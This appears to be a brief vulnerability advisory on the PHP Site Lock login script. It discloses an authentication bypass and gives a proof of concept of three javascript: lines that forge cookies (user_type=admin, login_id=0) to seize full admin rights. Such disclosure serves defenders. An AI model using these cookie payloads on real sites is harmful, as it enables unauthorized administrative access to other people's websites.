PHP Site Lock A highly secure website (Ed: haha) login script which has features like User Authentication & Management, Website Password Protection , protection of pdf , images , etc. The Vulnerability leads to full administration rights of the admin panel.

Proof of Concept:

javascript:document.cookie=”user_type=admin; path=/”
javascript:document.cookie=”login_name=admin; path=/”
javascript:document.cookie=”login_id=0; path=/”

Vendor was contacted three times over a 30 day period and didn’t not respond to any of the emails.

The full advisory can be found Here.